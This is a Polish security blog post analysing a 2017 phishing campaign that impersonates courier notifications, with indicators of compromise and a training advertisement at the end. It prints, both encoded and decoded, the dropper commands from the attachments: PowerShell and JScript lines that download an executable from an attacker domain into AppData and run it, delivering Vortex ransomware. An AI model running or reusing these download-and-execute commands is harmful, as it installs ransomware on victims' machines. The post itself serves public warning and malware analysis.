Uwaga na nową kampanię „Powiadomienie o planowanej wizycie kuriera”

dodał 12 grudnia 2017 o 10:06 w kategorii Złośniki  z tagami:
Uwaga na nową kampanię „Powiadomienie o planowanej wizycie kuriera”

Idą święta, a internauci ruszają masowo na zakupy. Czasem ciężko doliczyć się wszystkich paczek w drodze, a spamiętać kurierów, którzy mają je przywieźć, jest niemożliwe. Na właśnie takie okazje czekają przestępcy.

Od wczoraj trwa nowa kampania przestępców – a konkretnie jednego przestępcy, którego od wielu lat obserwujemy i trochę utrudniamy mu życie. Podzielcie się tym linkiem ze znajomymi, by jeszcze mniej z nich zostało ofiarami tego ataku.

Powiadomienie o planowanej wizycie kuriera

(a także „Powiadomienie o nadejściu przesyłki” oraz „Wkrótce odwiedzi Cie kurier !”)

Jak do tej pory zauważyliśmy trzy szablony wiadomości – wszystkie są bardzo podobne. Jeden z nich wygląda tak:

Treść wiadomości to:

Wiadomość wygenerowana automatycznie. Prosimy nie odpowiadać bezpośrednio na ten adres e-mail.
Szanowni Państwo

Uprzejmie informujemy że w dniu 2017-12-09 nasz klient nadał do Państwa przesyłkę o numerze 31701068902 za pośrednictwem firmy Geis

31701068902

Prosimy oczekiwać na Kuriera.

W załączniku znajduje się szczegółowe potwierdzenie nadania paczki.

Hasłem potrzebnym do otwarcia potwierdzenia, jest numer Twojej przesyłki.

—————————————————–
POLKURIER – Tanie Przesyłki Kurierskie
Biuro Obsługi Klienta
+48 62 591 7272
www.POLKURIER.pl

W drugiej wersji zmienia się data nadania na 2017-12-11 oraz firma z Geis na DPD. Numer przesyłki (stanowiący zarazem hasło załącznika) pozostaje bez zmian. W trzecim (temat „Wkrótce odwiedzi Cie kurier !”) numer przesyłki to 8312362998, a kurier to UPS.

Czas zatem na analizę zagrożenia.

Załącznik

W załączniku znajduje się plik o jednej z poniższych nazw:

Potwierdzenie nadania przesylki _PDF www.polkurier.pl.z
SzczegolyDotyczacePrzesylkii_PDF.z
SzczegolyDotyczacePrzesylkii_PDF.zip
Potwierdzenie nadania przesylki_PDF .uu

Wbrew różnym rozszerzeniom wszystkie pliki to archiwa RAR, a plik drugi i trzeci są identyczne. W archiwum znajduje się jeden z trzech plików:

Potwierdzenie nadania przesylki_PDF www.polkurier.pl.bat
Potwierdzenie nadania przesylki_PDF.bat
Potwierdzenie nadania przesylki_PDF.js

Pierwsze dwa mają zawierają:

POweRSHelL.ExE -Ex BYpass -eC CQAJAAkACQAJAFMAZQBUAC0AYwBPAG4AVABFAG4AVAAJAAkACQAJAAkALQB2AGEATAB1AGUACQAJAAkACQAJACgAbgBlAFcALQBPAEIAagBFAEMAVAAgAHMAeQBTAHQAZQBtAC4ATgBFAHQALgBXAGUAYgBDAGwAaQBlAE4AVAApAC4ARABPAFcAbgBMAG8AYQBEAFMAdABSAGkAbgBnACgACQAJAAkACQAJAB0gaAB0AHQAcAA6AC8ALwBvAG4AbABpAG4AZQAtAGQAbwBjAHMALgBlAHUALwBiAGkAbgAvAG4AbwB0AGEAdABuAGkAawAuAGUAeABlAB0gCQAJAAkACQAJACkACQAJAAkACQAJAC0AZQBOAEMATwBkAGkATgBnAAkACQAJAAkACQBzAHQAUgBpAG4ARwAJAAkACQAJAAkALQBQAEEAdABoAAkACQAJAAkACQAdICQARQBuAHYAOgBhAHAAUABEAEEAVABhAFwAYQBjAHIAbwB0AHIAYQB5AC4AZQB4AGUAHSAJAAkACQAJAAkAOwAJAAkACQAJAAkAcwB0AGEAcgB0AAkACQAJAAkACQAdICQARQBuAHYAOgBhAFAAUABEAGEAdABhAFwAYQBjAHIAbwB0AHIAYQB5AC4AZQB4AGUAHSA=
powershEll.EXe   -eX   bYpASS      -W   hIddEn   -Ec   IAAgACAAUwBlAFQALQBjAG8ATgBUAEUAbgB0ACAAIAAgAC0AdgBhAEwAVQBFACAAIAAgACgATgBFAHcALQBvAEIAagBlAGMAdAAgAFMAeQBTAHQAZQBNAC4ATgBlAFQALgB3AGUAYgBDAEwASQBFAG4AVAApAC4ARABvAFcATgBsAE8AQQBkAEQAYQBUAEEAKAAgACAAIAAdIGgAdAB0AHAAOgAvAC8AbwBuAGwAaQBuAGUALQBkAG8AYwBzAC4AZQB1AC8AYgBpAG4ALwBuAG8AdABhAHQAbgBpAGsALgBlAHgAZQAdICAAIAAgACkAIAAgACAALQBlAG4AYwBvAEQAaQBuAGcAIAAgACAAQgBZAFQARQAgACAAIAAtAFAAQQB0AEgAIAAgACAAHSAkAGUAbgBWADoAYQBQAFAAZABhAFQAQQBcAG0AcwBjAHIAYQBzAGgALgBlAHgAZQAdICAAIAAgADsAIAAgACAAcwBUAEEAcgBUAC0AcAByAE8AQwBFAHMAcwAgACAAIAAdICQAZQBOAHYAOgBhAFAAcABkAGEAdABhAFwAbQBzAGMAcgBhAHMAaAAuAGUAeABlAB0g   

Co po zdekodowaniu w obu przypadkach daje

SeT-cOnTEnT -vaLue (neW-OBjECT syStem.NEt.WebClieNT).DOWnLoaDStRing(  http://online-docs.eu/bin/notatnik.exe ) -eNCOdiNg stRinG -PAth  $Env:apPDATa\acrotray.exe ; start  $Env:aPPData\acrotray.exe

Trzeci plik (JS) wygląda tak:

new ActiveXObject("wScRIPt.ShEll").ruN( '"powERShElL.Exe" PoweRshelL.EXe -Ex bYPasS -W hiDDen -eC CQAJAAkAUABvAHcAZQBSAHMAaABlAGwATAAuAEUAWABlAAkACQAJAC0ARQB4AAkACQAJAGIAWQBQAGEAcwBTAAkACQAJAAkACQAJAC0AVwAJAAkACQBoAGkARABEAGUAbgAJAAkACQBpAE4AdgBPAGsAZQAtAHcARQBCAHIAZQBxAFUARQBTAFQACQAJAAkALQB1AFIASQAJAAkACQAdIGgAdAB0AHAAOgAvAC8AbwBuAGwAaQBuAGUALQBkAG8AYwBzAC4AZQB1AC8AYgBpAG4AMgAvAG4AbwB0AC4AZQB4AGUAHSAJAAkACQAtAE8AdQBUAEYASQBsAEUACQAJAAkAHSAkAEUAbgB2ADoAQQBwAHAARABBAFQAYQBcAG0AcwBkAGwAZAA2ADQALgBlAHgAZQAdIAkACQAJADsACQAJAAkAQwBtAEQACQAJAAkALwBDAAkACQAJAB0gJABFAG4AVgA6AGEAcABwAEQAQQBUAGEAXABtAHMAZABsAGQANgA0AC4AZQB4AGUAHSA= ' , 0 ) ;

i dekoduje się do

PoweRshelL.EXe -Ex bYPasS -W hiDDen iNvOke-wEBreqUEST -uRI  http://online-docs.eu/bin2/not.exe -OuTFIlE  $Env:AppDATa\msdld64.exe ; CmD /C  $EnV:appDATa\msdld64.exe

W pliku notepad.exe (not.exe jest identyczny) znajduje się ransomware Vortex/Flotera, szyfrujące dyski i żądające okupu. Adresy kontaktowe w tej wersji to

vortex@deszyfracja.int.pl
Hc9@goat.si

Serwer C&C ukryty jest pod domeną

http://kuchnia-marty.eu/

To ciekawa kontynuacja wzoru z poprzedniej kampanii tego samego autora, gdzie użyte domeny także były klonami popularnych blogów lifestylowych.

Zasoby użyte w kampanii

Emaile są oczywiście wysyłane od ponad 24h z tego samego serwera w Nazwa.pl (a poszły ich tysiące, zapewne jak zwykle to nie do wykrycia…):

aos57.rev.netart.pl [85.128.253.57]

Z serwerem Nazwa.pl przestępca łączy się z adresu:

91-192-100-5.gerber.non-logging.vpn [91.192.100.5]

Domeny użyte w ataku (oczywiście zarejestrowane w Nazwa.pl) to:

kuchnia-marty.eu [176.114.4.80]
online-docs.eu [212.224.98.194]

Hasze plików:

628419d4b5b56062d8d5ddf768978a0b8bdfd7ab09a325041ccc774f366cd8a5 SzczegolyDotyczacePrzesylkii_PDF.z
d5222a62e3ecd69a3941796786a47adac28e1d351f2f8e55b158a4a58d63f729 Potwierdzenie nadania przesylki _PDF www.polkurier.pl.z
8ab8cc21b4c54e3cadc1a6785d0ce7343422f8b56e0de960a94ea52f5a37ef72 Potwierdzenie nadania przesylki_PDF .uu
27ec7364fd5db0cdb34c092c6a00b698143a489bd5181f836199812b2fe3dba4 notatnik.exe

Co można z tym zrobić

Przestępcę najwyraźniej trudno złapać, za to na tego rodzaju ataki bardziej odporni są uczestnicy naszych szkoleń dla pracowników. Na każdym z nich uczymy między innymi by uważać na spakowane załączniki z hasłem, a przed świętami ostrzegaliśmy wiele razy o spodziewanych wiadomościach „od kurierów”. Najlepszą rekomendacją niech będzie jednak wypowiedź jednego z pracowników działu HR po zakończonym szkoleniu:

Opinia klienta
Robimy takie szkolenia od dawna, ale pierwszy raz klaskali

Sprawdźcie, czy i u Was będą klaskać!

Security Awareness - szkolenie dla personelu
Dziękujemy kilkunastu Czytelniczkom i Czytelnikom, którzy podesłali nam próbki tej kampanii.